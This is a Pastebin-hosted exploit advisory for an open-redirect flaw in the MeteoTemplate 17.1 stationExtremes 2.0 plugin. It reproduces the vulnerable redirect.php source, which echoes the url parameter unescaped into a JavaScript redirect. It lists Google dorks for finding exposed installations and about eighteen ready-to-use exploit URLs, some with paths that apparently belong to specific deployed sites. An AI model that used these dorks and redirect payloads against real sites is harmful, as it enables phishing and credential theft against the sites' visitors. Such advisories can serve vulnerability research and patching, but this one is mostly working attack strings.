Advertisement
KingSkrupellos

MeteoTemplate 17.1 Nectarine stationExtremes 2.0 Redirect

Feb 25th, 2019
112
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.50 KB | None | 0 0
  1. ################################################################################
  2.  
  3. # Exploit Title : MeteoTemplate 17.1 Nectarine stationExtremes Plugins 2.0 Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 26/02/2019
  7. # Vendor Homepage : meteotemplate.com
  8. # Software Download Link : meteotemplate.com/web/downloadRequest.php?file=stationExtremes_2.0
  9. # Software Information Link : meteotemplate.com/web/plugins.php
  10. # Software Affected Versions : 2.0 - 17.1 and v10.37S build 85
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:"/meteo/plugins/stationExtremes/"
  15. intext:Powered by Weather Display v10.37S build 85
  16. intext:''Meteotemplate 17.1 Nectarine''
  17. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ################################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. A plugin that shows station extremes filtered by parameter, grouping and time interval.
  27.  
  28. You can also view daily and monthly overviews.
  29.  
  30. ################################################################################
  31.  
  32. # Impact :
  33. ***********
  34. This web application MeteoTemplate 17.1 Nectarine stationExtremes Plugins 2.0 accepts a user-controlled
  35.  
  36. input that specifies a link to an external site, and uses that link in a Redirect.
  37.  
  38. This simplifies phishing attacks. An http parameter may contain a URL value and could cause
  39.  
  40. the web application to redirect the request to the specified URL. By modifying the URL value
  41.  
  42. to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
  43.  
  44. Because the server name in the modified link is identical to the original site, phishing attempts
  45.  
  46. have a more trustworthy appearance.
  47.  
  48. Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
  49.  
  50. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
  51.  
  52. Web users often encounter redirection when they visit the Web site of a company whose name
  53.  
  54. has been changed or which has been acquired by another company. Visiting unreal web page
  55.  
  56. user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
  57.  
  58. ################################################################################
  59.  
  60. # Vulnerable Parameter => url=
  61. ****************************
  62.  
  63. # Vulnerable Source Code : [ redirect.php ]
  64. ***************************************
  65. <?php
  66.  
  67.  
  68. include("../../config.php");
  69. include($baseURL."css/design.php");
  70. include($baseURL."header.php");
  71. $address = urldecode($_GET["url"]);
  72. ?>
  73. <html>
  74. <head>
  75. <?php metaHeader()?>
  76. <style>
  77. #loading{
  78. background-color: transparent;
  79. height: 100%;
  80. width: 100%;
  81. position: fixed;
  82. z-index: 1;
  83. margin-top: 0px;
  84. top: 0px;
  85. }
  86. #loading-center{
  87. width: 100%;
  88. height: 100%;
  89. position: relative;
  90. }
  91. #loading-center-absolute {
  92. position: absolute;
  93. left: 50%;
  94. top: 50%;
  95. height: 200px;
  96. width: 200px;
  97. margin-top: -100px;
  98. margin-left: -100px;
  99.  
  100. }
  101. .object{
  102. -moz-border-radius: 50% 50% 50% 50%;
  103. -webkit-border-radius: 50% 50% 50% 50%;
  104. border-radius: 50% 50% 50% 50%;
  105. position: absolute;
  106. border-left: 5px solid #FFF;
  107. border-right: 5px solid #FFF;
  108. border-top: 5px solid transparent;
  109. border-bottom: 5px solid transparent;
  110. -webkit-animation: animate 2s infinite;
  111. animation: animate 2s infinite;
  112. }
  113.  
  114. #object_one{
  115. left: 75px;
  116. top: 75px;
  117. width: 50px;
  118. height: 50px;
  119. }
  120.  
  121. #object_two{
  122. left: 65px;
  123. top: 65px;
  124. width: 70px;
  125. height: 70px;
  126. -webkit-animation-delay: 0.1s;
  127. animation-delay: 0.1s;
  128. }
  129.  
  130. #object_three{
  131. left: 55px;
  132. top: 55px;
  133. width: 90px;
  134. height: 90px;
  135. -webkit-animation-delay: 0.2s;
  136. animation-delay: 0.2s;
  137. }
  138. #object_four{
  139. left: 45px;
  140. top: 45px;
  141. width: 110px;
  142. height: 110px;
  143. -webkit-animation-delay: 0.3s;
  144. animation-delay: 0.3s;
  145.  
  146. }
  147.  
  148. @-webkit-keyframes animate {
  149.  
  150.  
  151. 50% {
  152. -ms-transform: rotate(180deg);
  153. -webkit-transform: rotate(180deg);
  154. transform: rotate(180deg);
  155. }
  156.  
  157. 100% {
  158. -ms-transform: rotate(0deg);
  159. -webkit-transform: rotate(0deg);
  160. transform: rotate(0deg);
  161. }
  162.  
  163. }
  164.  
  165. @keyframes animate {
  166.  
  167. 50% {
  168. -ms-transform: rotate(180deg);
  169. -webkit-transform: rotate(180deg);
  170. transform: rotate(180deg);
  171. }
  172.  
  173. 100% {
  174. -ms-transform: rotate(0deg);
  175. -webkit-transform: rotate(0deg);
  176. transform: rotate(0deg);
  177. }
  178. }
  179. </style>
  180. </head>
  181. <body onload="redirectpage()">
  182. <div id="loading">
  183. <div id="loading-center">
  184. <div id="loading-center-absolute">
  185. <div class="object" id="object_four">
  186. </div>
  187. <div class="object" id="object_three">
  188. </div>
  189. <div class="object" id="object_two">
  190. </div>
  191. <div class="object" id="object_one">
  192. </div>
  193. </div>
  194. </div>
  195. </div>
  196. </body>
  197. <script>
  198. function redirectpage(){
  199. window.location.href = "<?php echo $address ?>";
  200. }
  201. </script>
  202. </html>
  203.  
  204. ################################################################################
  205.  
  206. # Open Redirection Exploit :
  207. **************************
  208. /meteo/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  209.  
  210. /meteotemplate/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  211.  
  212. /template/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  213.  
  214. /Meteo/template/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  215.  
  216. /meteotemplate_new/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  217.  
  218. /meteotemplate-morro-das-antenas/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  219.  
  220. /thompsonfarms/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  221.  
  222. /plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  223.  
  224. /wstnijbroek/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  225.  
  226. /busteggia/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  227.  
  228. /eltiempo/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  229.  
  230. /knjazevac/MeteoTemplate/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  231.  
  232. /sitiodalaje/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  233.  
  234. /weather/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  235.  
  236. /pws/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  237.  
  238. /wxnet/flg1/template/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  239.  
  240. /MT41/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  241.  
  242. /subdom/meteo/plugins/stationExtremes/redirect.php?url=https://www.[REDIRECTION-ADDRESS].gov
  243.  
  244. ################################################################################
  245.  
  246. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  247.  
  248. ################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement